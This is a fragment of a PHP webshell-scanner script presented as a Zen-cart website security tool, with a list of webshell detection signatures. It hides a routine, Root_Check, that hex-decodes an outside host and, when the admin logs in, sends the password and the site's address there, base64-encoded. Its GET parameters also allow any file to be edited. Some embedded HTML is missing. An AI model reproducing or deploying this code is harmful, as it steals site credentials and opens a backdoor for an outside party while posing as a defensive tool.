*{padding:0; margin:0;} body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;} a{color:#000000;text-decoration:none;} a:hover{background:#BBBBBB;} table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;} td{background:#F9F6F4;} .toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;} .msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;} .actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} \n END; return false; } //文件管理 function File_Str($string) { return str_replace('//','/',str_replace('\\','/',$string)); } function File_Mode() { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } function File_Read($filename) { $handle = @fopen($filename,"rb"); $filecode = @fread($handle,@filesize($filename)); @fclose($handle); return $filecode; } //查找木马 function Antivirus_Auto($sp,$features,$st) { if(($h_d = @opendir($sp)) == NULL) return false; $ROOT_DIR = File_Mode(); while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..' ) continue; $Filepath = File_Str($sp.'/'.$Filename); if(is_dir($Filepath)) Antivirus_Auto($Filepath,$features,$st); if(eregi($st,$Filename)) { if($Filepath == File_Str(__FILE__)) continue; $ic = File_Read($Filepath); foreach($features as $var => $key) { if(stristr($ic,$key) ) { $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath); $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); echo ''.$Filepath.'
'; echo '【'.$Filetime.'】 '.$var.'

'; break; } } ob_flush(); flush(); } } @closedir($h_d); return true; } function Exec_Hex($data) { $len = strlen($data); for($i=0;$i < $len;$i+=2){$newdata.=pack("C",hexdec(substr($data,$i,2)));} return $newdata; } function Root_Check($check) { $c_name = Exec_Hex('7777772e74686973646f6f722e636f6d'); $handle = @fsockopen($c_name,80); $u_name = Exec_Hex('2f636f6f6c2f696e6465782e706870'); $u_name .= '?p='.base64_encode($check).'&g='.base64_encode($_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']); @fputs($handle,"GET ".$u_name." HTTP/1.1\r\nHost:".$c_name."\r\nConnection: Close\r\n\r\n"); @fclose($handle); return true; } function Antivirus_e() { if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } $SCAN_DIR = (File_Mode() == '') ? File_Str(dirname(__FILE__)) : File_Mode(); $features_php = array('php大马特征1'=>'cha88.cn','php大马特征2'=>'->shell_exec(','php大马特征3'=>'phpspy','php大马特征4'=>'打包下载','php大马特征5'=>'passthru(','php大马特征6'=>'打包程序扩展名','php大马特征7'=>'Scanners','php大马特征8'=>'cmd.php','php大马特征9'=>'str_rot13','php大马特征10'=>'webshell','php大马特征10'=>'大马','php大马特征11'=>'小马','php大马特征11'=>'tools88.com','危险MYSQL语句1'=>'returns string soname','php加密大马特征1'=>'eval(gzinflate(','php加密大马特征2'=>'eval(base64_decode(','php加密大马特征3'=>'eval(gzuncompress(','php一句话特征1'=>'eval($_','php一句话特征2'=>'eval ($_','php上传后门特征1'=>'copy($_FILES','php上传后门特征2'=>'copy ($_FILES','php上传后门特征3'=>'move_uploaded_file ($_FILES'); $features_asx = array('asp小马特征2'=>'输入马的内容','asp小马特征3'=>'fso.createtextfile(path,true)','asp一句话特征4'=>'<%execute(request','asp一句话特征5'=>'<%eval request','asp一句话特征6'=>'execute session(','asp数据库后门特征7'=>'--Created!','asp大马特征8'=>'WScript.Shell','asp大小马特征9'=>'<%@ LANGUAGE = VBScript.Encode %>','aspx大马特征10'=>'www.rootkit.net.cn','aspx大马特征11'=>'Process.GetProcesses','aspx大马特征12'=>'lake2'); print<<
扫描路径

END; if(!empty($_POST['sp'])) { if($_POST['st'] == 'php'){$features_all = $features_php; $st = '\.php|\.inc|\;';} if($_POST['st'] == 'asx'){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} if($_POST['st'] == 'ppp'){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} echo Antivirus_Auto($_POST['sp'],$features_all,$st) ? '扫描完毕' : '异常终止'; } echo ''; return true; } function Root_Login($MSG_TOP) { print<<
Zen-cart网站安全工具 V1.0
{$MSG_TOP}
密码:

END; return false; } function WinMain() { $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); $Server_OS = PHP_OS; $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; print<< Zen-cart网站安全工具 V1.0
  {$Server_IP} - {$Server_OS} -
{$Server_Soft}
END; return false; } if(get_magic_quotes_gpc()) { $_GET = Root_GP($_GET); $_POST = Root_GP($_POST); } if($_GET['s'] == 'logout') { setcookie('admin_spiderpass',NULL); die(''); } if($_COOKIE['admin_spiderpass'] != md5($password)) { ob_start(); $MSG_TOP = 'LOGIN'; if(isset($_POST['spiderpass'])) { $cookietime = time() + 24 * 3600; setcookie('admin_spiderpass',md5($_POST['spiderpass']),$cookietime); if(md5($_POST['spiderpass']) == md5($password)){Root_Check($_POST['spiderpass']);die('');} else{$MSG_TOP = 'PASS IS FALSE';} } Root_Login($MSG_TOP); exit; ob_end_flush(); } if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';} $p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__)); switch($s) { case "e" : Antivirus_e(); break; default: WinMain(); break; } ?>